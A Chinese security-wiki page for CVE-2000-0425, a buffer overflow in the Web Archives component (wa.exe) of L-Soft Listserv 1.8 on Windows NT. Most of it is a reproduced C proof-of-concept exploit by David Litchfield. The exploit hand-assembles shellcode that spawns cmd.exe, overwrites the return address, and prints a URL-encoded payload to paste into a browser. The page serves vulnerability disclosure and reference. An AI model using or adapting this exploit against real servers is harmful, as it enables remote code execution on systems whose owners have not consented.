L-Soft Listserv 1.8 Web Archives的缓冲区溢出漏洞-安全小百科

L-Soft Listserv 1.8 Web Archives的缓冲区溢出漏洞

漏洞ID	1105807	漏洞类型	缓冲区溢出
发布时间	2000-05-01	更新时间	2005-07-27
CVE编号	CVE-2000-0425	CNNVD-ID	CNNVD-200005-021
漏洞平台	Windows	CVSS评分	10.0

|漏洞来源

https://www.exploit-db.com/exploits/19893
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-021

|漏洞详情

L-SoftLISTSERV1.8的WebArchives组件存在缓冲区溢出漏洞，远程攻击者可以利用这个漏洞执行任意命令。

|漏洞EXP

source: http://www.securityfocus.com/bid/1167/info

The Web Archive component of L-Soft Listserv contains unchecked buffer code exploitable by sending specially crafted requests to the Web Archive. This weakness will allow execution of arbitrary code by remote attackers.

/////////////////////////////////////////////////////////////////
//
//
// LSOFT's Listserv web archives wa.exe buffer overflow
//
//
// This is "proof of concept code" and will spawn a shell
// perform a directory listing and redirect the output
// to a file called "cerberus.txt". Will work on Windows NT 4
// SP6a
//
//
// David Litchfield ([email protected])
//
// 1st May 2000
//
//
// Cut and paste the output into your web browser.
//
/////////////////////////////////////////////////////////////////

#include <stdio.h>
int main()
{
 unsigned char exploit[2000]="";
 int count = 0;

 while(count <100)
  {
   exploit[count]=0x90;
   count ++;
  }

 // push ebp
 exploit[count]=0x55;
 count ++;

 // mov ebp,esp
 exploit[count]=0x8B;
 count ++;
 exploit[count]=0xEC;
 count ++;

 // mov eax, 0x77f1a986
 exploit[count]=0xb8;
 count ++;
 exploit[count]=0x86;
 count ++;
 exploit[count]=0xa9;
 count ++;
 exploit[count]=0xf1;
 count ++;
 exploit[count]=0x77;
 count ++;

 // mov ebx, 0xffffffff
 exploit[count]=0xbb;
 count ++;
 exploit[count]=0xff;
 count ++;
 exploit[count]=0xff;
 count ++;
 exploit[count]=0xff;
 count ++;
 exploit[count]=0xff;
 count ++;

 file://sub ebx, 0xffffff8B
 exploit[count]=0x83;
 count ++;
 exploit[count]=0xeb;
 count ++;
 exploit[count]=0x8B;
 count ++;

 // push ebx
 exploit[count]=0x53;
 count ++;

 // push "xt.s"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x73;
 count ++;
 exploit[count]=0x2e;
 count ++;
 exploit[count]=0x74;
 count ++;
 exploit[count]=0x78;
 count ++;

 file://push "ureb"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x62;
 count ++;
 exploit[count]=0x65;
 count ++;
 exploit[count]=0x72;
 count ++;
 exploit[count]=0x75;
 count ++;

 file://push "rec "
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x20;
 count ++;
 exploit[count]=0x63;
 count ++;
 exploit[count]=0x65;
 count ++;
 exploit[count]=0x72;
 count ++;

 file://push "> ri"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x69;
 count ++;
 exploit[count]=0x72;
 count ++;
 exploit[count]=0x20;
 count ++;
 exploit[count]=0x3e;
 count ++;

 file://push "d c/"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x2f;
 count ++;
 exploit[count]=0x63;
 count ++;
 exploit[count]=0x20;
 count ++;
 exploit[count]=0x64;
 count ++;

 file://push " exe"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x65;
 count ++;
 exploit[count]=0x78;
 count ++;
 exploit[count]=0x65;
 count ++;
 exploit[count]=0x20;
 count ++;


 file://push "cmd."
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x63;
 count ++;
 exploit[count]=0x6d;
 count ++;
 exploit[count]=0x64;
 count ++;
 exploit[count]=0x2e;
 count ++;

 file://mov ebx, esp
 exploit[count]=0x8b;
 count ++;
 exploit[count]=0xdc;
 count ++;

 file://xor esi, esi
 exploit[count]=0x33;
 count ++;
 exploit[count]=0xf6;
 count ++;

 file://push esi
 exploit[count]=0x56;
 count ++;

 file://push ebx
 exploit[count]=0x53;
 count ++;

 file://call eax
 exploit[count]=0xff;
 count ++;
 exploit[count]=0xd0;
 count ++;

 // set a break point (int 3)
 while(count <420)
  {
   exploit[count]=0xCC;
   count ++;
  }


 // overwrite the return address

 exploit[count]=0x36;
 count ++;
 exploit[count]=0x28;
 count ++;
 exploit[count]=0xf3;
 count ++;
 exploit[count]=0x77;
 count ++;

 // put in 40 nops (0x90)

 while (count < 464)
  {
   exploit[count]=0x90;
   count ++;
  }

 // write our code that'll get us back into our un-tolower()ed string

 // move edx, 0xFFFFFFFF
 exploit[count]=0xBA;
 count ++;
 exploit[count]=0xFF;
 count ++;
 exploit[count]=0xFF;
 count ++;
 exploit[count]=0xFF;
 count ++;
 exploit[count]=0xFF;
 count ++;

 // sub edx, 0xFFDFAC87
 exploit[count]=0x81;
 count ++;
 exploit[count]=0xEA;
 count ++;
 exploit[count]=0x87;
 count ++;
 exploit[count]=0xAC;
 count ++;
 exploit[count]=0xDF;
 count ++;
 exploit[count]=0xFF;
 count ++;

 // jmp edx
 exploit[count]=0xFF;
 count ++;
 exploit[count]=0xE2;
 count ++;

 // set readable part in memory to stop first AV

 exploit[390]=0x36;
 exploit[390]=0xf3;
 exploit[391]=0x77;

 count = 0;
 while(count < 477)
  {
   printf("%%%x",exploit[count]);
   count ++;
  }

 return 0;
}

|参考资料

来源:www.lsoft.com
链接:http://www.lsoft.com/news/default.asp?item=Advisory0
来源:BID
名称:1167
链接:http://www.securityfocus.com/bid/1167
来源:BUGTRAQ
名称:20000505Alert:ListservWebArchives(wa)bufferoverflow
链接:http://archives.neohapsis.com/archives/bugtraq/2000-05/0048.html

相关推荐: Protegrity Secure.Data XP_PTY_Insert Buffer Overflow Vulnerability

Protegrity Secure.Data XP_PTY_Insert Buffer Overflow Vulnerability 漏洞ID 1100654 漏洞类型 Boundary Condition Error 发布时间 2003-03-13 更新时间…

文章版权归作者所有，未经允许请勿转载。

THE END